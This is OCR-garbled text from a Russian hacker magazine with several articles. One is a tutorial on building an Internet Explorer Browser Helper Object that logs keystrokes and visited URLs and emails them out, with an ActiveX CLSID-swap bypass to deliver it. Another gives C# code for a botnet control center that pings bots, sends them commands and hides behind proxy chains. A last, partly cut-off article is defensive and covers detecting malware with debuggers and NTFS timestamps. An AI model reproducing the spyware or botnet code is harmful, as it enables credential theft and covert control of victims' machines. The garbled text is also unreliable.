DECLARE_REGISTRY_RESOURCEID (IDR_BHO) 
DECLARE_PROTECT_FINAL_CONSTRUCT() 


BEGIN_COM_MAP (CBHO) 
COM_INTERFACE_ENTRY(IBHO) 
COM_INTERFACE_ENTRY(IDispatch) 
COM_INTERFACE_ENTRY (IObjectWithSite) 

END_COM_MAP () 


5 // IBHO 
Р// IObjectWithSite 
public: 
STDMETHOD (SetSite) (IUnknown *pUnkSite) ; 
STDMETHOD (Invoke) (DISPID, REFIID, LCID, 
private: 
STDMETHOD (Connect) (void) ; 
CComQIPtr<IWebBrowser2, sIID_IWebBrowser2> m_spUebBrowser2; 


DUORD m_dwCookie; 
ye 


ls #endit //_ BHO H_ 
L 


4 


Делаем BHO в обыкновенном Visual С++ 


Теперь наш ВНО научился отлавливать клавиатур- 
ные нажатия и заносить их в файл. Пожалуй, тут 
есть некоторое упущение. Клавиши-то он перехва- 
тывает, а вот с какого сайта? Модернизируем наш 
код еще несколькими функциями! 

Для реализации задумки необходимо перех- 
ватить URL из модели браузера и внести его в наш 
файлик. Эти дела будет осуществлять метод 
get_LocationURL, а выглядеть все будет так: 


Где wstr — это указатель на массив двухбайтовых 
символов, в который наш метод перенесет значения. 

Вот и все — общая картина прояснилась. Те- 
перь для полного и безоговорочного счастья оста- 
ется реализовать сохранение данных в файл: 


> регистрация в системе. Любому объекту, ко- 
торому необходимо закрепиться в операционной 
системе, надо выполнить регистрацию. Для Browser 
Helper Object есть специальные ключи реестра, в ко- 
торые нам необходимо внести информацию. 

Во время создания нашего проекта в студии 
также появился файл с расширением rgs. Он бу- 
дет добавлен в ресурсы, а также опишет действия, 


WORD, DISPPARAMS*, VARIANT*, 


EXCEPINFO*, UINT*); 


CComQIPtr<IConnectionPointContainer, sIID_IConnectionPointContainer> m_spCPC; 


+ 


которые и будут ответственны за регистрацию. 
Но, чтобы ВНО работал правильно, нам надо нем- 
ного этот файл подкорректировать. Первое, что 
мы сделаем, — меняем CLSID на TypeLib на те же, 
что и в нашем ВНО. Второе — добавим в файл 
еще один ключ, который студия нам не приписала, 
а также без которого наш ВНО не будет подгру- 
жаться к IE: 


r 


Теперь после компиляции нужно просто запустить 
regsvr32 с ключами /s /с и путем к нашей DLL. 
а как же отправлять намытые данные? Итак, 
маленький помощник пользователя создан, и он 
послушно выполняет свои действия. Но как же он 
будет их отправлять? Для этой цели мы включим в 
разработку отправку писем на емейл. 

Сначала создадим небольшой модуль, кото- 
рый будет считывать данные из файла: 


У 
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Ну а потом — через структуру smtp_address — 
определяем структуру сервиса для оправки писем, 
а также создаем сам коннект, который будет уже 
по нашей информации отправлять письмо. Весь 
код приводить мы тут не будем: его можно найти 
на нашем компакт-диске. 

горячая доставка пользователю. С основны- 
ми моментами покончено. Только вопрос: а как же 
злоумышленники доставляют продукт конечному 
пользователю? Здесь им помогают ActiveX-o6bek- 
ты, которые представляющие собой небольшие 
исполняемые модули, которые могут быть внедре- 
ны в документы. Такими документами являются, 
например, Word или Excel. В качестве документов- 
контейнеров могут служить также и меб-страни- 
цы, написанные Ha HTML. При отображении такой 
страницы браузер предоставляет внедренному 
модулю ActiveX прямоугольную область на стра- 
нице. В ней модуль может себя прорисовывать, 
взаимодействовать с пользователем, принимать и 
выводить данные и т.д. Помимо визуальных Acti- 
уеХ-объектов существуют и невизуальные. Они слу- 
жат главным образом для доступа к определенным 
программным ресурсам машины или к данным 
пользователя и операционной системы. В этом 


% 


разделе мы рассмотрим тип уязвимости совре- 
менных браузеров, основанных на несанкциони- 
рованном запуске Activex. 

При активации этого объекта Explorer не за- 
прашивает разрешения у пользователя, посколь- 
ку объект сертифицирован. 

После загрузки ActiveX модифицируем его 
CLSID, заменяя его на CLSID необходимого нам 
несертифицированного ActiveX (в данном случае 
WScript.Network): 


После загрузки странички приведенный скрипт 
нужно запускать спустя несколько секунд, посколь- 
ку объекту требуется время, чтобы активироваться: 


После модификации СЕЗ!-объекта мы получаем 
новый объект с нужным нам CLSID, и браузер при 
этом не запрашивает подтверждения на запуск у 
пользователя! 

даешь больше функций! Можно сказать, что 
у нас получился универсальный шпион, но ведь на 
свете существует еще много интересного! Посмо- 
трим на функции, которые могут помочь в созда- 
нии собственного ВНО. 

Как известно, многие веб-мастеры хотят, что- 
бы их проект лицезрело большое количество лю- 
ей... А что необходимо для раскрутки проекта? Ко- 
нечно, помимо честных способов и финансирования 
различных добрых помощников. Наверное, ВНО в 
этом тоже может помочь, ведь существует функция 
для задания URL. Рассмотрим ее на примере. 


+ 


hb 


При условии грамотного использования BHO ком- 
пьютерный негодяй сможет провернуть по-настояще- 


му прибыльное дельце! К примеру, можно установить 
в панели браузера небольшую рекламу, которую бу- 
дет лицезреть жертва. Чтобы узнать об этом больше, 
нужно почитать информацию вот об этих функциях: 


Мне больше всего понравилась IDeskBand. В ее ко- 
де явно прописывается, какое сделать окно, и опи- 
сывается функция закрытия окна, а это для нас 
важно! Можно просто пропустить эту функцию — 
и тогда оно откроется навечно. Вот пример: 


Товарищам, которым понравился такой злокаче- 
ственный вариант рекламы, прямая дорога в 
MSDN, в раздел «Creating Custom Explorer Bars, То- 
ol Bands, and Desk Bands» — там приводятся KOH- 
кретные примеры по созданию Bars & Bands. 

Если же программер является шутником или 
просто великим врагом Internet Explorer, то для не- 
го у нас тоже припасен один пример. 

Если рассмотреть функцию IHTMLDocument2 
повнимательней, то можно найти в ней уйму инте- 
ресных методов, например, следующие: Close, open, 
offline u, конечно же, write. С помощью этих нехи- 
трых функций плохой человек сможет сделать ра- 
боту BIE невозможной! 
> The End. Вот и подошла к концу наша поэма 
о BHO. Основываясь на этой статье и MSDN, ты 
сможешь сделать то, о чем мечтал долгие годы — 
простого и функционального помощника. Но учти, 
что использовать его в противозаконных целях — 
большое зло! Статья написана в образовательных 
целях, так что мы не несем ответственности за лю- 
дей, которые любят совать нос в чужие дела! © 


http://msdn.microsoft.com/library/default.asp?url=/library/ 
en-us/dnwebgen/himl/bho.asp 
больше информации о технологии BHO 


www.antichat.ru/activex 
информация о зловредном ПО и технологии ActiveX 


ПРОГРАММИРОВАНИЕ. В СЛЕДУЮЩЕМ НОМЕРЕ МЫ РАСКРОЕМ СЕКРЕТЫ: 


ОБРАБОТКИ БОЛЬШИХ ОБЪЕМОВ ДАННЫХ 
СЕКРЕТЫ ИСКУССТВА СОСТАВЛЕНИЯ КОММЕНТАРИЕВ 
КЕВМЕЕ-КОДИНГА 
МАСТЕРСТВА АРХИТЕКТУРЫ IBM РС 
C# 
СКРИПТОВАНИЯ ПОД FLASH | 
ПРОГРАММИРОВАНИЯ МИКРО-УСТРОЙСТВ 


РАБОТЫ В КОМАНДЕ 
DELPHI 2006 


СКОРО В СПЕЦЕ: WINDOWS VISTA 
ВЗГЛЯД ИЗНУТРИ. ПОДРОБНЫЙ АНАЛИЗ НОВОЙ OC OT 
MICROSOFT. НОВЕЙШИЕ ТЕХНОЛОГИИ. УДОБСТВО, 
БЫСТРОТА РАБОТЫ. 
БЕЗОПАСНОСТЬ WINDOWS 
АКТУАЛЬНЫЕ УЯЗВИМОСТИ WINDOWS. УНИВЕРСАЛЬНЫЕ 
ЭКСПЛОИТЫ. АТАКА ЧЕРЕЗ БРАУЗЕР. ПРОФЕССИОНАЛЬНОЕ 
БЕЗОПАСНОЕ УПРАВЛЕНИЕ СИСТЕМОЙ И СЕТЬЮ 
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> что должна уметь подобная система? Есте- 
ственно, главной функцией такого рода программ 
является массовое отправление команд ботам, но, 
на самом деле, этого мало: не менее важной функ- 
цией является способность определить, какие боты 
в настоящий момент времени находятся в онлайне, 
а какие — в оффлайне. Также, если троян много- 
функциональный: умеет похищать пароли, емейлы, 
работать с файлами на зараженном компьютере 
ит.д., то у хакера должна быть возможность об- 
щаться с каждым ботом в отдельности. Если control 
center будет находиться на компьютере у хакера, то 
уровень безопасности заметно снизится, поэтому 
логично разместить его где-нибудь подальше. Не- 
которые предпочтут разместить такую систему на 
линуксовом шелле, но для этого надо иметь хоро- 
ший wenn uv eye 100% гарантию того, что он вне- 
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УПРАВЛЕНИЕ БОТНЕТОМ 
ПО-НОВОМУ 


В РАЗЛИЧНЫХ ИЗДАНИЯХ ЧАСТО 
РАССКАЗЫВАЮТ О ТОМ, КАК ХАКЕРЫ ПИШУТ 
ПРОГРАММЫ ДЛЯ УГНЕТЕНИЯ НЕВИННЫХ 
ПОЛЬЗОВАТЕЛЕЙ. ВО ВСЕХ ЭТИХ СТАТЬЯХ 
ПОДРОБНО ОПИСЫВАЮТСЯ ФУНКЦИИ 
ЗАРАЖЕНИЯ ФАЙЛОВ, РАБОТЫ 

С ЗАРАЖЕННЫМ КОМПЬЮТЕРОМ, ИНОГДА 
ДАЖЕ DDOS-ATAK, НО ДОВОЛЬНО РЕДКО 
ВСТРЕЧАЮТСЯ СТАТЬИ, В КОТОРЫХ 
ОПИСЫВАЮТСЯ ПРИНЦИПЫ УПРАВЛЕНИЯ 
БОЛЬШИМ КОЛИЧЕСТВОМ БОТОВ. СЕГОДНЯ 
МЫ УЗНАЕМ, КАК ПЛОХИЕ ПРОГРАММИСТЫ 
ПИШУТ BOT CONTROL CENTER 


Дроздов Андрей aka Sulverus, 
sulverus @ тай.ги (Offbit Security Team 


запно He пропадет, поэтому лучшим решением, на 
мой взгляд, является создание скрипта, который 
можно будет разместить на каком-нибудь забугор- 
ном хостинге. Также, если хакер не хочет лишний 
раз светиться, то из соображений безопасности бы- 
ло бы вполне рационально написать веб-сервис, 
который бы находился в другом месте и непосред- 
ственно проверял количество ботов в сети. И, нако- 
нец, надо написать программу, через которую ха- 
кер будет соединяться с веб-сервисом для провер- 
ки своего ботнета. Для большей безопасности ло- 
гично использовать цепь проксей. В общем, хватит 
разговоров — приступим к практике! 


> — кодим. Возможно, многие стали бы решать 
подобную задачу на рейе'е или php, но я огненный 
поклонник всеобщего прогресса, поэтому буду ис- 
пользовать С#. Для создания веб-сервиса мы бу- 
дем использовать платформу ASP.NET, благода- 
ря которой можно создавать С# веб-проекты. 
Организуем новый ASP.NET Web Site с под- 
держкой С# и начинаем кодить. Для работы с 
ASP.NET обычно используется пространство имен 
System.Web. Нам понадобятся классы Ul, WebCon- 
trols, WebControls.WebParts, HtmlControls. Если мы 
захотим запаролить (a мы, скорее всего, захотим), 
то необходимо будет использовать класс Sy- 
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stem.Web.Security. Для начала определимся с ин- 
терфейсом: он должен быть прост и понятен, а со- 
держать он должен форму для отправки команд бо- 
там, форму для проверки активности ботов, форму 
для общения с одним ботом. Можно еще сделать 
форму с настройками. Кроме разных форм, обяза- 
тельно должен быть текстовый контейнер, в кото- 
ром будут отображаться сообщения ботов. 

> привет — о’кей. С интерфейсом разобра- 
лись, теперь перейдем к сетевым функциям. Что- 
бы работать с сокетами, нам понадобятся про- 
странства имен System.Net и System.Net.Sockets. 
Прежде чем командовать ботами, необходимо про- 
верить, сколько ботов в данный момент в сети. 
Для этого надо научить бота здороваться с кон- 
трол-центром. Например, когда хакер будет на- 
жимать кнопку «проверить связь», программа бу- 
дет рассылать по всем зараженным 1Р-адресам 
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Тестируем веб-сервис для проверки связи 


сообщения «привет», а бот, если он в онлайне, 
получив такое сообщение, должен будет ответить 
«о’кей». Таким образом, будет происходить иден- 
тификация активных ботов в сети. После полу- 
ченных сообщений программа должна в удобном 
виде представить хакеру список активных ботов, 
например в компонент ListBox. Значит, в интер- 
фейс мы добавим два листбокса: в первый мы бу- 
дем выводить список всех ботов, а в другой — 
только активных. Теперь напишем функцию, ко- 
торая все это будет совершать. 

Кроме вышеупомянутых пространств имен, 
нам еще потребуется пространство System.Text для 
конвертирования типов, а именно: нам нужно будет 
преобразовать тип данных string в int. Для этого есть 
класс Convert, в котором есть большой набор функ- 
ций для конвертирования из всего во все. Сперва 
переведем количество IP-agpecos в тип данных int: 


string items = 
ListBoxl.Items.Count.ToString(); 
int itm = Convert.ToInt32 (items) ; 


A теперь таким же образом переведем номер 
порта B int: 


string BOTport = TextBox4.Text; 
int prt = Convert.ToInt32(BOTport) ; 


После таких преобразований мы можем написать 
цикл для проверки связи (смотрим соответствую- 
щую врезку). 

В принципе, все довольно понятно: органи- 
зуется цикл, в котором создается сокет, а потом 
идет попытка соединения с ботом. Для этого мы 
регистрируем переменные типа |PHostEntry, IPAd- 
ress, IPEndPoint, затем создаем сокет, использую- 
щий протокол ТСР, далее центр отправляет боту 
сообщение «привет», предварительно подготовив 
массив байтов методом Encoding.ASCIl.GetBy- 
tes(msg). Если программа получает «», то она счи- 
тает, что бот активный. В конце цикла мы закры- 
ваем сокет методом Socket.Shutdown() и Soc- 
ket.Close(). Теперь необходимо написать функ- 
цию, которая будет отправлять команды активным 
ботам. Она, собственно, у нас уже написана — ее 
надо только немного подкорректировать: нужно, 
чтобы функция брала IP-anpec для отправки сооб- 


Пишем систему контроля ботами 


щений не из первого ListBox'a, а из второго, и сла- 
ла не слово «привет», а любую команду — для это- 
го надо просто поменять строку на: 


= TextBoxl.Text; 
= Encoding.ASCII.GetBytes (msg) ; 


string msg 
byte[] msg2 


Теперь, когда мы можем полноценно разговари- 
вать с ботами, надо подготовить наш скрипт для 
экспорта в интернет и откомпилироваться. 

> — готовим на экспорт. Во-первых, нам нужно 
подправить web.config, чтобы наш скрипт работал 
на хостинге. Для этого нужно заменить 


<authentication mode="Windows"/> 
на строку 


<authentication mode="0ff"/>, 


или просто закомментировать, но делать это нуж- 
но не в блокноте, а именно в студии, чтобы потом 
не было глюков. 

После таких нехитрых действий компилиру- 
емся и заливаем наш скрипт на хостинг. Теперь 
можно работать. 
> Vista Style. Иногда бывает ситуация, когда 
нежелательно залезать в сам центр по тем или 
иным причинам, а узнать, сколько ботов в данный 
момент находится в сети, необходимо. Что делать 
в подобном случае? Есть много способов решения 
подобной проблемы, но самым удобным, на мой 
взгляд, является удаленный разговор с центром 
управления ботами. Такая тактика общения с цен- 
тром хороша из соображений безопасности. На- 
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1++) 


1 < itm; 


ListBox1l.SelectedIndex = i; 


(1) 


TPHostEntry host = Dns.Resolve(ListBoxl.SelectedItem.Text) ; 


//работаем с сокетами 


TPAddress ip = host.AddressList [0]; 
//обьявляем переменные 


IPEndPoint ep = new IPEndPoint (ip, prt); 


Socket client_sock = new Socket (AddressFamily.InterNetwork, 


SocketType.Stream, ProtocolType.Tcp) ; 


try 
{ 
client_sock.Connect (ep) ; 


string msg = "privet"; //ПРИВЕТ:) 


byte[] msg2 = Encoding.ASCII.GetBytes (msg) ; 


int send_msg = 


byte[] data = new byte[1024]; 
int recv = 


ListBox2.Items.Add(ip.ToString()); 


client_sock. Shutdown (SocketShutdown. Both) ; 


client_sock.Close(); 
} 
catch (SocketException Sock) 
{ 


TextBox7.Text = Sock.ToString(); 


пример, если хакер будет соединяться с центром 
через цепочку проксей, и не на прямую, а с под- 
ключением к веб-службе, которая может нахо- 
диться на другом конце мира. Приступим к напи- 
санию всего этого хозяйства. Для начала нам надо 
создать новый проект типа ASP.NET Web Service. 
Что собой представляет данное нововведение? 


Работаем с сервисом через клиент 


с11епе_зоск.Веселуе (data) ; 


//перекодируем ее в байты 


client_sock.Send(msg2) ; 


//закрываем сокет 


На самом деле, это простой скрипт, с которым 
можно работать не напрямую, а обращаясь к нему 
по http-npotokony из какого-либо приложения 
(обычной программы или другого скрипта). Веб- 
сервисы используют пространства имен Sy- 
stem.Web.Services, System.Web.Services.Protocols, 
System.Web.Services.Description u System.Web.Ser- 
vices.Discovery. Во втором пространстве имен 
обозначены типы для работы с протоколами, по 
которым будут обмениваться данными веб-служ- 
ба со своим клиентом. Веб-служба может исполь- 
зовать HTTP GET/POST и SOAP. Мы будем ис- 
пользовать НТТР. Создав проект, мы видим С# 
код, в котором встречаются строки [WebMethod] — 
нетрудно догадаться, что так обозначаются функ- 
ции, которыми будет обладать сервис. Для наших 
целей достаточно написать функцию для провер- 
ки связи с ботами, и, чтобы это реализовать, в 
сервисе мы должны использовать уже известные 
нам пространства имен, а именно: System.Net, Sy- 


stem.Net.Sockets, а также пространство имен Sy- 
stem.Text для конвертирования из байтов в АЗСИ, 
и обратно. Надо условиться, что когда клиент де- 
лает запрос к сервису, то сервис получает данные 
о боте и выводит или его ПР-адрес, если бот в он- 
лайне, или, если бот не активен, выводит фразу на 
языке ботов: BINAN(Bot Is Not Available Now). Te- 
перь надо создать строку, в которую мы будем все 
это возвращать, и дописать туда код для проверки 
связи — для этого нужно просто взять кусок кода 
из ранее написанного нами скрипта для работы с 
ботами и немного дописать его: 


создаем функцию для сервиса 


Рассмотрим все выше написанное. В начале мы 
регистрируем строковый тип данных, затем полу- 
чаем !Р-адрес и порт бота, к которому нам надо со- 
единиться. Далее мы используем новую возмож- 
ность технологии .МЕТ, конвертируя строку в int, 
используя метод Tolnt32() класса Convert. В случае 
удачного соединения мы выводим !Р-адрес бота, 
причем не в виде текста, а в виде хт!-кода. При не- 
удачной попытке соединения мы присваиваем пе- 
ременной порт — значение BINAN и выводим его в 
xml. Вот и все. Настало время написать клиента к 
этому сервису. 

> — пишем клиента. Что должен уметь клиент? 
Уметь соединяться с веб-службой и спрашивать 
ее при помощи И р-запросов, есть ли бот в онлай- 
не. Поскольку клиент будет располагаться на ком- 
пьютере у хакера, то тут мы вольны в своих жела- 
ниях — можно сделать интерфейс а-ля мейл-агент. 
Например, программа будет сидеть в трее, а как 
только пройдет проверка на количество ботов — 
появится всплывающая подсказка со статистикой 
ботнета. Создаем еще один проект в студии, вы- 
бираем Windows Application. Теперь надо зареги- 
стрировать в проекте наш веб-сервис, чтобы мы 
могли к нему обращаться. Для этого нужно зайти в 
Solution Explorer, щелкнуть правой клавишей по 
проекту и выбрать Add Web Reference. Теперь на- 
до вставить туда адрес нашего веб-сервиса и при- 
ступать к программированию клиента. Если ты 
все правильно сделал, то в коде должна появиться 
строка: using localhost. Или вместо localhost — лю- 


бое заданное название. Теперь надо создать про- 
стой интерфейс и написать функцию для общения 
с веб-сервисом. Для начала нам надо научиться 
работать с сервисом. Объявляем переменную, 
создаем объект, затем обращаемся к сервису и 
возвращаем ответ сервиса в строковый тип дан- 
ных. Реализуем вышесказанное в коде: 


Теперь нужно написать цикл, похожий на тот, ко- 
торым мы проверяли количество активных бо- 
тов, но только без подключения к ним, используя 
ВОТ ЭТОТ КОД: 


цикл для проверки связи без подключения 


| 


У 


повышаем безопасность. На данный момент 
у нас есть цепь: бот-центр-сервис-цепь проксей- 
клиент-хакер, однако вполне можно реализовать 
связующее звено между клиентом и веб-сервисом 
для большей безопасности). Благодаря такому 
звену безопасность повысится в два раза, но для 
этого нужно много веб-пространства на разных 
серверах. Поэтому создадим веб-сервис, анало- 
гичный нашему, и просто немного переделаем 
функцию приема и передачи данных, чтобы обра- 
зовывалась цепь. Использование подобной цепи в 
связке с цепью проксей сильно увеличивает шан- 
сы хакера остаться незамеченным. 

Хотя данный скрипт и подходит к любым Spy- 
м/аге-программам, которые принимают команды 
таким способом, я все равно покажу, как хакеры 
подгоняют под него ботов. В июльском номере 
журнала «Хакер» я уже рассказывал об азах напи- 
сания подобных программ на .NET'e. Теперь надо 
только немного подогнать: добавим функцию для 
операции «привет-о’кей» — для этого нужно вста- 
вить в главный цикл еще одно условие: 


a 
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Добавляем ссылку на веб-сервис в проект 


Таким образом, программа преобразует наш «о’кей» 
в массив байтов. А теперь осталось написать цикл 
для повисания на 11000 порте — для этого мы бу- 
дем использовать все те же классы Net и Net.Soc- 
kets. Для начала объявим все переменные и напи- 
шем цикл: 


подгонка бота 


> вывод. Ha основе технологии .МЕТ мы созда- 
ли набор программ для управления ботнетами. 
Заметь, насколько увеличивается безопасность 
благодаря веб-сервисам. Используя подобную 
тактику, хакер всегда останется незаметным в се- 
ти при работе с ботами, а это немаловажно. В дан- 
ной системе управления ботами есть много плю- 
сов. Единственным минусом является только то, 
что для большого числа звеньев необходимо мно- 
го серверов, на которых мы разместим веб-серви- 
сы. Достаточно всего лишь 1-2 дополнительных 
сервиса — если тебе нужна высокая безопас- 
ность, и 3-4 — если ты параноик:). На примере 
этой статьи хорошо видно, насколько много воз- 
можностей дает технология .МЕТ для хакера, так 
что, кто еще не вооружился, бегом ставить 2005 
студию. Однако не забывай: DDOS-ataku — это в 
высшей степени незаконно. Не стоит подрывать 
свою судьбу/жизны/карьеру скитаниями по судам 
и прочим инстанциям, ведь подобные системы 
можно использовать не только во зло, но и для 
управления компьютерами во время net renderinga 
при моделировании в 3d тах'е. Очень советую пе- 
речитать статью, чтобы усвоить все выше сказан- 
ное. Если у тебя есть какие-то вопросы или пред- 
ложения относительно статьи — пиши, я с радо- 
стью отвечу © 


На компакт-диске ты найдешь исходники к контрол-центру, 
веб-сервису, клиенту и дописанному боту 


Напоминаю, что все материалы статьи представлены 
исключительно для исследовательских целей — 
не стоит использовать их во зло 
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Во времена MS-DOS ручная чистка компьютера 
была обычным делом. Количество исполняемых 
файлов измерялось десятками, и существовало не 
так уж и много мест, пригодных для внедрения 
малвари. Под «малварью» (от английского malwa- 
ге) подразумевается вредоносное программное 
обеспечение — вирусы, черви, шпионы и т.д. С 
приходом Windows все изменилось. Из крохотного 
поселка операционная система превратилась в 
огромный, стремительно разрастающийся мегало- 
полис, среди сотен тысяч файлов которого может 
спрятаться и слонопотам. 

Один человек за разумное время вряд ли су- 
меет обнаружить качественно спроектированную 
и грамотно заложенную закладку. Намного проще 


разоблачение 


ВЫЯВЛЕНИЕ ВРЕДОНОСНОГО ПО 


АНТИВИРУСЫ (ДАЖЕ СО ВСЕМИ АПДЕЙТАМИ) ДАЛЕКО НЕ ВСЕГДА РАСПОЗНАЮТ МАЛВАРЬ. 
ПОЭТОМУ СТОИТ ДОВЕРЯТЬ ТОЛЬКО ОТЛАДЧИКУ SOFT-ICE И ДРУГОМУ НИЗКОУРОВНЕВОМУ 
ИНСТРУМЕНТАРИЮ, ПОЗВОЛЯЮЩЕМУ ПРОБУРИТЬ НОРУ ДО САМОГО ЯДРА И РАЗОБЛАЧИТЬ 
ЗЛОВРЕДНЫЕ ПРОГРАММЫ, ГДЕ БЫ ОНИ НЕ СКРЫВАЛИСЬ 


(да и быстрее) переустановить Windows с нуля. 
К счастью, качественная малварь — огромная 
редкость, практически не встречающаяся в живой 
природе. В основном приходится сталкиваться с 
пионерскими поделками, оставляющими после 
себя кучу следов и легко различимыми с помощью 
soft-ice и сопутствующих ему утилит. 

Весь вопрос в том, как правильно ими пользо- 
ваться. Hy, установил soft-ice, нажал <CTRL-D>, 
увидел черный экран... Дальше-то что?! А вот даль- 
ше начинаем делиться хакерскими секретами... 
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ащенном виде) (1) 

:THREAD -х 

Extended Thread Info for thread 374 
KTEB 873CFDAO TID: 374 Process: va_thread(11C) 
Start ЕТР: KERNEL32!SetUnhandledExceptionFilter+001A (77E878C1) 
User Stack: 00030000 — 00130000 Stack Ptr: 0012FD24 

Extended Thread Info for thread 238 
KTEB: 82007020 TID: 238 Process: va_thread(11C) 
Start EIP: KERNEL32!CreateFileA+00C3 (77E92C50) 
User Stack: 00420000 — 00520000 Stack Ptr: FFFFFFFF 

Extended Thread Info for thread 30C 
KTEB: 82007АСО TID: 30C Process: va_thread(11C) 
Start EIP: KERNEL32!CreateFileAt+00C3 (77E92C50) 
User Stack: 00530000 — 00630000 Stack Ptr: FFFFFFFF 
информация о четырех потоках, выданная OllyDbg (2) 
Tdent Entry Data block Last error Status Priority 
050C 7943B700 7FFDBO00 ERROR_SUCCESS Active 32 10 
0558 00000000 7FFDCO000 ERROR_SUCCESS Suspended 320 10 
055C 00000000 7FFDE000 ERROR_SUCCESS Suspended 32 + 0 
0578 00000000 7FFDDO00 ERROR_SUCCESS Suspended 32 + 0 
код потока 558h, находящегося в пределах страничного имиджа (3) 
401000 55 PUSH ЕВР 
401001 8B EC MOV EBP,ESP 
401003 B8 01000000 MOV EAX,1 
401008 —85С0 TEST ВАХ, ЕАХ 
40100А 74 02 JE SHORT va_threa.0040100E 
40100C ЕВ F5 JUMP SHORT va_threa.00401003 


потока 55Ch лежит стартовый ar вместе (4) 

62FFDC FFFFFFFF End of SEH chain 
62FFEO 79481F54 SE handler 
62FFE4 79432B08 KERNEL32.79432B08 
62FFE8 00000000 
62FFEC 00000000 
62FFFO 00000000 
62FFF4 00520000 ; стартовый адрес потока 55Ch 
62FFF8 00000666 ; аргумент, переданный потоку 
62FFFC 00000000 ; дно пользовательского стека потока 

а памяти процесса va_th (5) 
Address Size Owner Section Contains Type Access Initial 
400000 1000 va_threa PE header Imag R RWE 
401000 4000 va_threa .text code Imag R RWE 
405000 1000 va_threa .rdata imports Imag В RWE 
406000 2000 va_threa .data data Imag R RWE 
410000 2000 Map R R 
51E000 1000 Priv RW Guar RW 
51F000 1000 stack of thr Priv RW Guar RW 
520000 1000 Priv RWE RWE 
62E000 1000 Priv RW Guar RW 


> = время оставляет отпечатки. Чаще всего мал- 
варь копирует свою тушу в новый файл со случай- 
ным или фиксированным названием, реже — вне- 
дряется в уже существующие (что требует не толь- 
ко знания устройства РЕ-формата, но и определен- 
ных привилегий, в частности, из-под пользователь- 
ского аккаунта системные файлы просто так не за- 
разишь). При этом подавляющее большинство 
таМ/аге-писателей забывают скорректировать да- 
ту/время создания файла, выдавая себя с головой. 

Допустим, ты запустил файл сомнительного 
происхождения и хочешь узнать, не натворил ли 
он чего в системе. Пуск > Найти > Файлы и Папки 
— Параметры Поиска > Файлы, созданные за ххх 
последних дней (в нашем случае за один). Все из- 
менения, произошедшие за последние сутки в си- 
стеме, становятся видны как на ладони. Kak вари- 
ант: в FAR'e устанавливаешь режим сортировки 
по дате создания (<CTRL-F8>) и заходишь во все 
«злачные» каталоги типа WINNT, System32 и т.д. 
Прием простой, как паровой котел, но чрезвычай- 
но эффективный! 

Конечно, чем позже ты спохватишься, тем 
сложнее будет отличить «легальные» файлы от 
«нелегальных», особенно если на компьютер ста- 
вится большое количество самого разнообразного 
программного обеспечения. Но все файлы, устана- 
вливаемые инсталлятором (где бы он их не разме- 
щал, в Program Files, WINNT или System32), имеют 
одну и ту же дату создания с небольшим разбро- 
сом во времени (ведь файлы создаются не парал- 
лельно, а последовательно), поэтому их стразу 
можно исключить из списка подозреваемых. А 
оставшиеся — подвергнуть тщательному допросу. 

Естественно, дата создания файла элемен- 
тарно изменяется средствами Win32-API, и малва- 
ри, при желании, ничего не стоит замаскировать- 
ся. Однако на МТЕ$-разделах каждый файл обла- 
дает множеством «невидимых» атрибутов, до ко- 
торых нельзя дотянуться через АР!. В частности, 
атрибут 30h ($FILE_NAME) помимо стандартных 
времен создания/модификации/последнего обра- 
щения хранит время последней модификации 
данной записи MFT (Master File Table — специаль- 
ного мастерфайла, содержащего информацию 
обо всех остальных объектах файловой системы). 
У «честных» файлов время создания и время по- 
следней модификации МЕТ всегда совпадает, а 
если это не так — перед тобой подделка. Еще су- 
ществует атрибут 10h (SSTANDARD_INFORMATI- 
ОМ), так же хранящий информацию о времени 
создания/модификации/последнего доступа фай- 
ла и времени последней модификации МЕТ, одна- 
ко, в отличие от атрибута 30h, здесь время по- 
следней модификации МЕТ автоматически обно- 
вляется всякий раз, когда файлу выделяется но- 
вая порция кластеров, а потому со временем его 
создания оно может и не совпадать. 

Существует не так уж много утилит, отобра- 
жающих содержимое МЕТ в удобочитаемом виде. 
Одна из них — NtExplorer от Runtime Software. Гру- 


Поиск файлов, созданных за последнее время, 

с помощью штатных средств Windows 

(видим файл hidrrr.exe, «окопавшийся» в каталоге 
CAWINNT\system32) 


Обнаружение файла с поддельным временем 
создания при помощи Runtime NtExplorer 

(РАВ утверждает, что файл создан 07.05.2004, 

в то время как соответствующая ему запись в МЕТ 
модифицировалась 18.07.2006) 


Исследование даты создания файлов при 
помощи FAR'a 


бо говоря, это Norton Disk Editor, но только под 
NTFS. К сожалению, NtExplorer не поддерживает 
ни плагинов, ни скриптов, поэтому быстро выве- 
сти список файлов с поддельными датами созда- 
ния не получается и каждый из них приходится пе- 
ребирать «руками». Но МТЕ$ совсем несложная 
(по нынешним меркам) файловая система, а все 
ее основные структуры давным-давно реконструи- 
рованы, документированы и выложены в Сеть: 
http://linux-ntfs.sourceforge.net. Создание программы, 
выполняющей автоматизированный поиск «под- 
дельных» файлов, не займет много времени. До- 
рогу осилит идущий! 


> дерево процессов. Обычно малварь создает 
свой собственный процесс (реже — внедряется в 
чужие), при этом возникает вполне естественное 
желание скрыть этот процесс, убрав его из «Дис- 
петчера Задач» и прочих системных утилит. Как 
это делается? Для предоставления информации о 
процессах МТ поддерживает два механизма: на- 
бор документированных процедур TOOLHELP32 
(доставшийся «в наследство» от 9х), реализован- 
ных в KERNEL32.DLL, и недокументированную 
функцию NtQuerySystemInformation (экспортируе- 
мая NTDLL.DLL), представляющую собой тонкую 
«обертку» вокруг системного сервиса 97h, реали- 
зованного в NTOSKRNL.EXE. На самом деле, главная 
функция TOOLHELP32 — CreateToolhelp32Snapshot 
— полностью опирается на NtQuerySystemInforma- 
tion, так что фактически механизм у нас один, толь- 
ко интерфейсы разные. 

Малварь может легко перехватить процеду- 
ры Process32First/Process32Next из TOOLHELP32, 
только это ничего не даст, поскольку практически 
все утилиты («Диспетчер Задач», FAR и даже при- 
митивный tlist.exe из SDK) работают исключитель- 
но через NtQuerySystemInformation (что легко под- 
тверждается установкой точки останова в SOft ice). 
Однако перехватить NtQuerySysteminformation с 
прикладного уровня ничуть не сложнее, чем про- 
цедуры из набора TOOLHELP32. Существует нес- 
колько способов, сделать это: 


1 МОДИФИЦИРОВАТЬ NTDLL.DLL НА ДИС- 
КЕ, УСТАНОВИВ В НАЧАЛО ФУНКЦИИ 
NTQUERYSYSTEMINFORMATION КОМАН- 
ДУ ПЕРЕХОДА НА СВОЙ ОБРАБОТЧИК 
(РАСПОЛОЖЕННЫЙ ГДЕ-НИБУДЬ В СВО- 
